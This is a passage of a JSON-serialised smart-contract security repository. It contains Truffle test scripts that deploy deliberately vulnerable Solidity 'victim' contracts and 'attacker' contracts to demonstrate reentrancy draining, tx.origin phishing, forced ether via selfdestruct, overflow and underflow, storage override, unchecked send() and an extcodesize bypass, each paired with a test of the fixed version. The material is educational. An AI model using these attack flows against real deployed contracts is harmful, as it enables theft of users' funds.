    "content": "var ExtCodeSize = artifacts.require(\"./ExtCodeSize.sol\");\nvar ExtCodeSizeAttacker = artifacts.require(\"./ExtCodeSizeAttacker.sol\");\n\ncontract(\"Extcodesize test\", (accounts) => {\n\n    it(\"Test extcodesize\", async () => {\n\n        var victim = await ExtCodeSize.new();\n        // We check that the initial address is 0\n        var addr = await victim.thisIsNotAContract();\n        assert.equal(0x0, addr);\n        // just creating an instance of the attacker passing the victim address as an argument will call the method\n        // aContractCannotCallThis from the constructor. Because we call it from the constructor, extcodesize\n        // will return 0. If we call that method from a normal function it wouldn't\n        var attacker = await ExtCodeSizeAttacker.new(victim.address);\n        var addr = await victim.thisIsNotAContract();\n        assert.equal(attacker.address, addr);\n\n        // just double checking what we already know, obviously, the attacker is a contract and it has code\n        // PWND!\n        var attackerCode = await web3.eth.getCode(attacker.address);\n        assert.isFalse(attackerCode.length == 0);\n    });\n});\n"
  },
  {
    "path": "test/extcodesize/extCodeSizeTestFixed.js",
    "content": "var ExtCodeSizeFixed = artifacts.require(\"./ExtCodeSizeFixed.sol\");\nvar ExtCodeSizeAttacker = artifacts.require(\"./ExtCodeSizeAttacker.sol\");\n\ncontract(\"Extcodesize test\", (accounts) => {\n\n    it(\"Test extcodesize\", async () => {\n\n        var victim = await ExtCodeSizeFixed.new();\n        // We check that the initial address is 0\n        var addr = await victim.thisIsNotAContract();\n        assert.equal(0x0, addr);\n        // now this call should fail because we are checking the condition in a different way (using tx.origin == msg.sender)\n        try {\n            var attacker = await ExtCodeSizeAttacker.new(victim.address);\n            assert(false, \"This contract creation should revert\");\n        } catch (error) {\n            assert.include(error.message, \"revert\");\n        }\n        var addr = await victim.thisIsNotAContract();\n        // checking that the address was not modified\n        assert.equal(0x0, addr);\n\n        await victim.aContractCannotCallThis();\n        var addr = await victim.thisIsNotAContract();\n        // checking that the address now is modified when calling the method from a non-contract address\n        assert.equal(accounts[0], addr);\n    });\n});\n"
  },
  {
    "path": "test/forcether/forceEtherTest.js",
    "content": "var ForceEtherVictim = artifacts.require(\"./ForceEtherVictim.sol\");\nvar ForceEtherAttacker = artifacts.require(\"./ForceEtherAttacker.sol\");\n\ncontract(\"ForceEther\", (accounts) => {\n\n    var victim;\n    var attacker;\n\n    it(\"ForceEther\", () => {\n        return ForceEtherVictim.deployed().then(instanceVictim => {\n            victim = instanceVictim;\n            return victim.address;\n        }).then((address) => {\n            return ForceEtherAttacker.new(address);\n        }).then((instanceAttacker) => {\n            attacker = instanceAttacker;\n        }).then(() => {\n            return victim.getOwner.call();\n        }).then((owner) => {\n            assert.equal(accounts[0], owner);\n            return victim.changeOwner({from:accounts[1]});\n        }).then(() => {\n            return victim.getOwner.call();\n        }).then((owner) => {\n            // checking that we cannot change the owner\n            assert.equal(accounts[0], owner);\n            victim.transfer({value: 1, from: accounts[1]});\n        }).then(() => {\n            assert(false, \"VM Exception revert\");\n        }).catch((error) => {\n            return victim.getOwner.call();\n        }).then((owner) => {\n            // checking that the owner remains the same\n            assert.equal(accounts[0], owner);\n            // we run the fallback function of the attacker contract\n            // if performs selfdestruct and *forces* a transaction to the victim contract\n            // and the fallback of the victim contract is not executed (so, revert() is not called)\n            // making its balance to be higher than 0\n            return web3.eth.sendTransaction({\n                from: accounts[0],\n                to: attacker.address,\n                value: 1\n            });\n        }).then(() => {\n            // now, we can change the owner\n            return victim.changeOwner({from: accounts[1]});\n        }).then(() => {\n            return victim.getOwner.call();\n        }).then((owner) => {\n            // checking that the owner actually changed\n            assert.equal(accounts[1], owner);\n        });\n    });\n});\n"
  },
  {
    "path": "test/overunderflow/overUnderFlowFixedTest.js",
    "content": "var BigNumber = require('bignumber.js');\nvar OverUnderFlowFixed = artifacts.require(\"./OverUnderFlowFixed.sol\");\n\ncontract(\"OverUnderFlowFixed\", (accounts) => {\n\nvar maxNumber = new BigNumber(2).pow(256).minus(1);\nvar zeroNumber = new BigNumber(0);\nvar inst;\n\n    it(\"Test overflow\", () => {\n        return OverUnderFlowFixed.deployed().then(instance => {\n            inst = instance;\n            return instance.getMax.call();\n        }).then((max) => {\n            // checking that 'max' variable in the contract is actually 2^256-1\n            assert.isTrue(max.equals(maxNumber));\n        }).then(() => {\n            // we call overflow, which increments 'max' and should causes an overflow but throws a VM exception\n            return inst.overflow({gasPrice:0});\n        }).then(() => {\n            // will not run this\n            assert(false, \"Should throw an exception\");\n        }).catch(error => {\n            assert(true, \"Exception thrown\");\n            return inst.getMax.call();\n        }).then((max) => {\n            // we check that overflow didn't happen\n            assert.isTrue(max.equals(maxNumber));\n        });\n    });\n\n    it(\"Test underflow\", function() {\n        return OverUnderFlowFixed.deployed().then(instance => {\n            inst = instance;\n            return instance.getZero.call();\n        }).then((zero) => {\n            // checking that 'zero' variable in the contract is actually 0\n            assert.isTrue(zero.equals(zeroNumber));\n        }).then(() => {\n            // we call underflow, which increments 'zero' and should causes an underflow but throws a VM exception\n            return inst.underflow({gasPrice:0});\n        }).then(() => {\n            // will not run this\n            assert(false, \"Should throw an exception\");\n        }).catch(error => {\n            assert(true, \"Exception thrown\");\n            return inst.getZero.call();\n        }).then((zero) => {\n            // we check that underflow didn't happen\n            assert.isTrue(zero.equals(zeroNumber));\n        });\n    });\n});\n"
  },
  {
    "path": "test/overunderflow/overUnderFlowTest.js",
    "content": "var BigNumber = require('bignumber.js');\nvar OverUnderFlow = artifacts.require(\"./OverUnderFlow.sol\");\n\ncontract(\"OverUnderFlow\", (accounts) => {\n\nvar maxNumber = new BigNumber(2).pow(256).minus(1);\nvar zeroNumber = new BigNumber(0);\nvar inst;\n\n    it(\"Test overflow\", () => {\n        return OverUnderFlow.deployed().then(instance => {\n            inst = instance;\n            return instance.getMax.call();\n        }).then((max) => {\n            // checking that 'max' variable in the contract is actually 2^256-1\n            assert.isTrue(max.equals(maxNumber));\n        }).then(() => {\n            // we call overflow, which increments 'max' and causes an overflow\n            inst.overflow({gasPrice:0});\n            return inst.getMax.call();\n        }).then((max) => {\n            // checking that the overflow happened, and now the value of 'max' is 0\n            assert.isTrue(max.equals(zeroNumber));\n        });\n    });\n\n    it(\"Test underflow\", function() {\n        return OverUnderFlow.deployed().then(instance => {\n            inst = instance;\n            return instance.getZero.call();\n        }).then((zero) => {\n            // checking that 'zero' variable in the contract is actually 0\n            assert.isTrue(zero.equals(zeroNumber));\n        }).then(() => {\n            // we call underflow, which decrements 'zero' and causes an underflow\n            inst.underflow({gasPrice:0});\n            return inst.getZero.call();\n        }).then((zero) => {\n            // checking that the underflow happened, and now the value of 'zero' is 2^256-1\n            assert.isTrue(zero.equals(maxNumber));\n        });\n    });\n});\n"
  },
  {
    "path": "test/reentrancy/reentrancyTest.js",
    "content": "var ReentrancyVulnerable = artifacts.require(\"./ReentrancyVulnerable.sol\");\nvar ReentrancyAttacker = artifacts.require(\"./ReentrancyAttacker.sol\");\n\ncontract(\"ReentrancyVulnerable\", (accounts) => {\n\n    var victim;\n    var attacker;\n\n    it(\"Test reentrancy\", () => {\n        // deploying the victim contract\n        return ReentrancyVulnerable.new().then(instanceVictim => {\n            victim = instanceVictim;\n            return victim.address;\n        }).then(address => {\n            // deploying the attacker instance, passing the address of the victim\n            return ReentrancyAttacker.new(address);\n        }).then (instanceAttacker => {\n            attacker = instanceAttacker;\n            return attacker.getContractBalance.call();\n        }).then((attackerBalance => {\n            // checking that the starting balance is 0\n            assert.equal(0, attackerBalance);\n            return victim.getContractBalance.call();\n        })).then((victimBalance => {\n            // checking that the starting balance is 0\n            assert.equal(0, victimBalance);\n            // deposit 410 from the account[0]\n            return victim.deposit({gasPrice:0, value:410});\n        })).then(() => {\n            return victim.getContractBalance.call();\n        }).then((victimBalance => {\n            // checking that the contract balance no is 410\n            assert.equal(410, victimBalance);\n        })).then(() => {\n            return attacker.depositInContract({gasPrice:0, value: 100});\n        }).then(() => {\n            return victim.getContractBalance.call();\n        }).then(victimContractBalance => {\n            // checking that the contract balance is 510\n            assert.equal(510, victimContractBalance);\n            return victim.checkBalance({from :accounts[0]});\n        }).then(balanceAccount0 => {\n            // checking account[0] balance is 410\n            assert.equal(410, balanceAccount0);\n            return victim.checkBalance({from : attacker.address});\n        }).then(attackerBalance => {\n            // checking that the attacker contract's balance is 100\n            assert.equal(100, attackerBalance);\n        }).then(() => {\n            return attacker.withdraw({gasPrice:0, gasLimit:9999999999});\n        }).then(() => {\n            return victim.getContractBalance.call();\n        }).then((victimBalance) => {\n            // the remaining contract balance must be 10. The balance of\n            // the attacker contract was 100, the total victim balance is 510,\n            // and the attacker can only withdraw ether in bulks of 100,\n            // 510 % 100 = 10\n            assert.equal(10, victimBalance);\n        });\n    });\n});\n"
  },
  {
    "path": "test/reentrancy/reentrancyTestFixed.js",
    "content": "var ReentrancyVulnerableFixed = artifacts.require(\"./ReentrancyVulnerableFixed.sol\");\nvar ReentrancyAttacker = artifacts.require(\"./ReentrancyAttacker.sol\");\n\ncontract(\"ReentrancyVulnerableFixed\", (accounts) => {\n\n    var victim;\n    var attacker;\n\n    it(\"Test reentrancy Fixed\", () => {\n        // deploying the victim contract\n        return ReentrancyVulnerableFixed.new().then(instanceVictim => {\n            victim = instanceVictim;\n            return victim.address;\n        }).then(address => {\n            // deploying the attacker instance, passing the address of the victim\n            return ReentrancyAttacker.new(address);\n        }).then (instanceAttacker => {\n            attacker = instanceAttacker;\n        }).then(() => {\n            return attacker.getContractBalance.call();\n        }).then((attackerBalance => {\n            // checking that the starting balance is 0\n            assert.equal(0, attackerBalance);\n            return victim.getContractBalance.call();\n        })).then((victimBalance => {\n            // checking that the starting balance is 0\n            assert.equal(0, victimBalance);\n            // deposit 410 from the account[0]\n            return victim.deposit({gasPrice:0, value:410});\n        })).then(() => {\n            return victim.getContractBalance.call();\n        }).then((victimBalance => {\n            // checking that the contract balance no is 410\n            assert.equal(410, victimBalance);\n        })).then(() => {\n            return attacker.depositInContract({gasPrice:0, value: 100});\n        }).then(() => {\n            return victim.getContractBalance.call();\n        }).then(victimContractBalance => {\n            // checking that the contract balance is 510\n            assert.equal(510, victimContractBalance);\n            return victim.checkBalance({from :accounts[0]});\n        }).then(balanceAccount0 => {\n            // checking account[0] balance is 410\n            assert.equal(410, balanceAccount0);\n            return victim.checkBalance({from : attacker.address});\n        }).then(attackerBalance => {\n            // checking that the attacker contract's balance is 100\n            assert.equal(100, attackerBalance);\n        }).then(() => {\n            return attacker.withdraw({gasPrice:0, gasLimit:9999999999});\n        }).then(() => {\n            return victim.getContractBalance.call();\n        }).then((victimBalance) => {\n            assert.equal(510, victimBalance);\n        });\n    });\n});\n"
  },
  {
    "path": "test/send/sendTest.js",
    "content": "var WalletSendBug = artifacts.require(\"./WalletSendBug.sol\");\nvar WalletSendAttacker = artifacts.require(\"./WalletSendAttacker.sol\");\n\ncontract(\"WalletSendBug\", (accounts) => {\n\n    var wallet;\n    var attacker;\n\n    it(\"Unchecked send()\", () => {\n        return WalletSendBug.deployed().then(instance => {\n            wallet = instance;\n            return instance.address;\n        }).then((address) => {\n            return WalletSendAttacker.new(address);\n        }).then(attackerInstance => {\n            attacker = attackerInstance;\n            return wallet.deposit({value: 50});\n        }).then(() => {\n            return wallet.balanceOf(accounts[0]);\n        }).then(balance0 => {\n            assert.equal(50, balance0);\n            return wallet.withdraw(25);\n        }).then(() => {\n            return wallet.balanceOf(accounts[0]);\n        }).then(balance0 => {\n            // checking than deposit & withdraw work as expected\n            assert.equal(25, balance0);\n            return attacker.deposit({value: 100});\n        }).then(() => {\n            return wallet.balanceOf(attacker.address);\n        }).then(attackerBalance => {\n            assert.equal(100, attackerBalance);\n            // Here the bug happens. Attacker withdraws, the victim tries to send ether, but it does not accept it.\n            // Since the attacker does not check the output of send(), it removes the funds from the balances and totalSupply\n            // variables, but the contract still has the amount in its balance, breaking the invariant.\n            return attacker.withdraw(50);\n        }).catch(error => {\n            assert(true, \"A revert is executed in the attacker fallback function\");\n        }).then(() => {\n            return wallet.balanceOf(attacker.address);\n        }).then(attackerBalance => {\n            assert.equal(50, attackerBalance);\n            return web3.eth.getBalance(wallet.address);\n        }).then(walletBalance => {\n            // Checking that the balance of the contract was untouched even if attacker tried to withdraw\n            assert.equal(125, walletBalance);\n            return wallet.getTotalSupply.call();\n        }).then(walletTotalSupply => {\n            // checking that the invariant is now broken\n            assert.equal(75, walletTotalSupply);\n            // We check that now noone can withdraw from the wallet because the invariant is violated\n            return wallet.withdraw(1);\n        }).then(() => {\n            assert(false, \"This block should not be run\");\n        }).catch(error => {\n            assert(true, \"assert() kicks in\");\n        }).then(() => {\n            return wallet.balanceOf(accounts[0]);\n        }).then(balance0 => {\n            // we check again that the balance of account[0] did not change because it is not possible to withdraw\n            assert.equal(25, balance0);\n        });\n    });\n});\n"
  },
  {
    "path": "test/send/sendTestFixed.js",
    "content": "var WalletSendBugFixed = artifacts.require(\"./WalletSendBugFixed.sol\");\nvar WalletSendAttacker = artifacts.require(\"./WalletSendAttacker.sol\");\n\ncontract(\"WalletSendBug\", (accounts) => {\n\n    var wallet;\n    var attacker;\n\n    it(\"Unchecked send()\", () => {\n        return WalletSendBugFixed.deployed().then(instance => {\n            wallet = instance;\n            return instance.address;\n        }).then((address) => {\n            return WalletSendAttacker.new(address);\n        }).then(attackerInstance => {\n            attacker = attackerInstance;\n            return wallet.deposit({value: 50});\n        }).then(() => {\n            return wallet.balanceOf(accounts[0]);\n        }).then(balance0 => {\n            assert.equal(50, balance0);\n            return wallet.withdraw(25);\n        }).then(() => {\n            return wallet.balanceOf(accounts[0]);\n        }).then(balance0 => {\n            // checking than deposit & withdraw work as expected\n            assert.equal(25, balance0);\n            return attacker.deposit({value: 100});\n        }).then(() => {\n            return wallet.balanceOf(attacker.address);\n        }).then(attackerBalance => {\n            assert.equal(100, attackerBalance);\n            // The bug does not happen now\n            return attacker.withdraw(50);\n        }).catch(error => {\n            assert(true, \"Attacker does not accept ether, so this fails\");\n        }).then(() => {\n            return wallet.balanceOf(attacker.address);\n        }).then(attackerBalance => {\n            assert.equal(100, attackerBalance);\n            return web3.eth.getBalance(wallet.address);\n        }).then(walletBalance => {\n            assert.equal(125, walletBalance);\n            return wallet.getTotalSupply.call();\n        }).then(walletTotalSupply => {\n            // the invariant is fine now\n            assert.equal(125, walletTotalSupply);\n            // We check that withdrawals work\n            return wallet.withdraw(1);\n        }).then(() => {\n            return wallet.balanceOf(accounts[0]);\n        }).then(balance0 => {\n            assert.equal(24, balance0);\n        });\n    });\n});\n"
  },
  {
    "path": "test/storageoverride/testStorageOverride.js",
    "content": "var StorageVictim = artifacts.require(\"./StorageVictim.sol\");\n\ncontract(\"Storage override\", (accounts) => {\n\n    var storage;\n\n    it(\"Test storage override\" , () => {\n        return StorageVictim.deployed().then(instance => {\n            storage = instance;\n        }).then(() => {\n            return storage.getOwner.call();\n        }).then(owner => {\n            assert.equal(accounts[0], owner);\n            // here we override storage address 0 instead of adding the struct into the mapping\n            return storage.store(5, {from : accounts[1]});\n        }).then(() => {\n            return storage.getOwner.call();\n        }).then(owner => {\n            assert.equal(accounts[1], owner);\n            return storage.getStore.call({from: accounts[1]});\n        }).then(result => {\n            assert.equal(accounts[1], result[0]);\n            assert.equal(5, result[1]);\n        });\n    });\n});\n"
  },
  {
    "path": "test/storageoverride/testStorageOverrideFixed.js",
    "content": "var StorageVictimFixed = artifacts.require(\"./StorageVictimFixed.sol\");\n\ncontract(\"Storage override Fixed\", (accounts) => {\n\n    var storage;\n\n    it(\"Test storage override Fixed\" , () => {\n        return StorageVictimFixed.deployed().then(instance => {\n            storage = instance;\n        }).then(() => {\n            return storage.getOwner.call();\n        }).then(owner => {\n            assert.equal(accounts[0], owner);\n            return storage.store(5, {from : accounts[1]});\n        }).then(() => {\n            return storage.getOwner.call();\n        }).then(owner => {\n            // owner didn't change\n            assert.equal(accounts[0], owner);\n            return storage.getStore.call({from: accounts[1]});\n        }).then((result) => {\n            assert.equal(accounts[1], result[0]);\n            assert.equal(5, result[1]);\n        });\n    });\n});\n"
  },
  {
    "path": "test/txorigin/txOriginTest.js",
    "content": "var TxOriginVictim = artifacts.require(\"./TxOriginVictim.sol\");\nvar TxOriginAttacker = artifacts.require(\"./TxOriginAttacker.sol\");\n\ncontract(\"TxOriginVictim\", (accounts) => {\n\n    var victim;\n    var attacker;\n\n    it(\"Test tx.origin\", () => {\n        return TxOriginVictim.deployed().then(instanceVictim => {\n            victim = instanceVictim;\n            return victim.address;\n        }).then(victimAddress => {\n            return TxOriginAttacker.new(victimAddress, accounts[1]);\n        }).then(attackerInstance => {\n            attacker = attackerInstance;\n            return web3.eth.getBalance(victim.address);\n        }).then((victimBalance) => {\n            assert.equal(0, victimBalance);\n            return attacker.getOwner.call();\n        }).then(attackerOwner => {\n            assert.equal(accounts[1], attackerOwner);\n            return victim.getOwner.call();\n        }).then(victimOwner => {\n            assert.equal(accounts[0], victimOwner);\n            // deposit ether into victim contract from accounts[0]\n            web3.eth.sendTransaction({\n                from: accounts[0],\n                to: victim.address,\n                value: 5\n            });\n        }).then(() => {\n            return web3.eth.getBalance(victim.address);\n        }).then(victimBalance => {\n            assert.equal(5, victimBalance);\n            // this should not work, since accounts[1] is not the owner\n            return victim.transferTo(accounts[1], victimBalance, {from: accounts[1]});\n        }).then(() => {\n            assert(false, \"It should revert\");\n        }).catch((error) => {\n            assert(true);\n            return web3.eth.getBalance(victim.address);\n        }).then(victimBalance => {\n            assert.equal(5, victimBalance);\n            // If the owner of the victim contract is tricked somehow to send ether to the attacker contract...\n            web3.eth.sendTransaction({\n                from: accounts[0],\n                to: attacker.address,\n                value: 1\n            });\n        }).then(() => {\n            return web3.eth.getBalance(victim.address);\n        }).then(victimBalance => {\n            // we check that the victim contract balance is 0\n            assert.equal(0, victimBalance);\n        });\n    });\n});\n"
  },
  {
    "path": "test/txorigin/txOriginTestFixed.js",
    "content": "var TxOriginVictimFixed = artifacts.require(\"./TxOriginVictimFixed.sol\");\nvar TxOriginAttacker = artifacts.require(\"./TxOriginAttacker.sol\");\n\ncontract(\"TxOriginVictim Fixed\", (accounts) => {\n\n    var victim;\n    var attacker;\n\n    it(\"Test tx.origin fixed\", () => {\n        return TxOriginVictimFixed.deployed().then(instanceVictim => {\n            victim = instanceVictim;\n            return victim.address;\n        }).then(victimAddress => {\n            return TxOriginAttacker.new(victimAddress, accounts[1]);\n        }).then(attackerInstance => {\n            attacker = attackerInstance;\n            return web3.eth.getBalance(victim.address);\n        }).then((victimBalance) => {\n            assert.equal(0, victimBalance);\n            return attacker.getOwner.call();\n        }).then(attackerOwner => {\n            assert.equal(accounts[1], attackerOwner);\n            return victim.getOwner.call();\n        }).then(victimOwner => {\n            assert.equal(accounts[0], victimOwner);\n            // deposit ether into victim contract from accounts[0]\n            web3.eth.sendTransaction({\n                from: accounts[0],\n                to: victim.address,\n                value: 5\n            });\n        }).then(() => {\n            return web3.eth.getBalance(victim.address);\n        }).then(victimBalance => {\n            assert.equal(5, victimBalance);\n            // this should not work, since accounts[1] is not the owner\n            return victim.transferTo(accounts[1], victimBalance, {from: accounts[1]});\n        }).then(() => {\n            assert(false, \"It should revert\");\n        }).catch((error) => {\n            assert(true);\n            return web3.eth.getBalance(victim.address);\n        }).then(victimBalance => {\n            assert.equal(5, victimBalance);\n            // this transfer will revert with the fixed version of the victim contract\n            web3.eth.sendTransaction({\n                from: accounts[0],\n                to: attacker.address,\n                value: 1\n            });\n        }).then(() => {\n            assert(false, \"Should revert, checking msg.sender and not tx.origin\");\n        }).catch((error) => {\n            return web3.eth.getBalance(victim.address);\n        }).then(victimBalance => {\n            // we check that the victim contract balance is 5 and it is not vulnerable now\n            assert.equal(5, victimBalance);\n        });\n    });\n});\n"
  },
  {
    "path": "truffle-config.js",
    "content": "module.exports = {\n  // See <http://truffleframework.com/docs/advanced/configuration>\n  // to customize your Truffle configuration!\n  compilers: {\n    solc: {\n      version: \"0.4.24\" // ex:  \"0.4.20\". (Default: Truffle's installed solc)\n    }\n  }\n}\n"
  },
  {
    "path": "truffle.js",
    "content": "module.exports = {\n  // See <http://truffleframework.com/docs/advanced/configuration>\n  // to customize your Truffle configuration!\n};\n"
  }
]